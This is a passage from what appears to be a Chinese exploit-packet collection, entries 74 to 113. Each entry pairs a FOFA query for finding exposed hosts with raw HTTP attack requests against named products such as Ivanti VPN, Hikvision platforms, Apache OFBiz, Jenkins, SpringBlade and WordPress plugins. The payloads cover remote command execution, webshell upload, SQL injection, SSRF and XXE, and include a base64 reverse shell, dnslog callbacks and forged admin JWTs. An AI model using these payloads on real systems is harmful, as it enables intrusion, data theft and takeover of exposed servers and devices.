POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3
PAYLOAD
74. 致远M3-server 6_1sp1 反序列化RCE
FOFA:title="M3-Server"
PAYLOAD
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x
76. 新开普掌上校园服务管理平台service.action远程命令执行
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1
{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"
/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream
hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"
Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png
YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"
/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x
79. BYTEVALUE 百为流控路由器远程命令执行
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host:IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1
<% out.print("oessqeonylzaf");%>
GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL
z1=1&z2="|id;"&z3=bhost
83. JeecgBoot testConnection 远程命令执行
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json
PAYLOAD
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip
{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}
85. SysAid On-premise< 23.3.36远程代码执行
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
EXP数据包如下,注入哥斯拉马
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip
PAYLOAD
回显URL:http://x.x.x.x/userfiles/index.jsp
86. 日本tosei自助洗衣机RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
host=%0acat${IFS}/etc/passwd%0a&command=ping
87. 安恒明御安全网关aaa_local_web_preview文件上传
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--
/jfhatuwe.php
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.xx.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
/astdfkhl.php
89. 致远互联FE协作办公平台editflow_manager存在sql注入
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
option=2&GUID=-1'+union+select+111*222--+
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
92. 海康威视运行管理中心session命令执行
Fastjson命令执行
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778
PAYLOAD
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain
wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--
GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain
pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--
GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip
<?xml version="1.0"?>
<methodCall>
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
用ysoserial生成payload
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
将生成的payload替换到上面的POC
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip
PAYLOAD
96. Apache OFBiz18.12.11 groovy 远程代码执行
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
groovyProgram=throw+new+Exception('id'.execute().text);
反弹shell
在kali上启动一个监听
nc -lvp 7777
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
98. SpiderFlow爬虫平台远程命令执行
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
99. Ncast盈可视高清智能录播系统busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip
------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php
2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--
101. ivanti policy secure-22.6命令注入
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.xx.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close
{
"topicurl":"getSysStatusCfg",
"token":""
}
105. SpringBlade v3.2.0 export-user SQL 注入
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
106. SpringBlade dict-biz/list SQL 注入
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
107. SpringBlade tenant/list SQL 注入
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth:替换为自己的
Connection: close
108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
109. Jenkins CLI 任意文件读取
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
110. Goanywhere MFT 未授权创建管理员
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
111. WordPress Plugin HTML5 Video Player SQL注入
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
112. WordPress Plugin NotificationX SQL 注入
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
113. WordPress Automatic 插件任意文件下载和SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
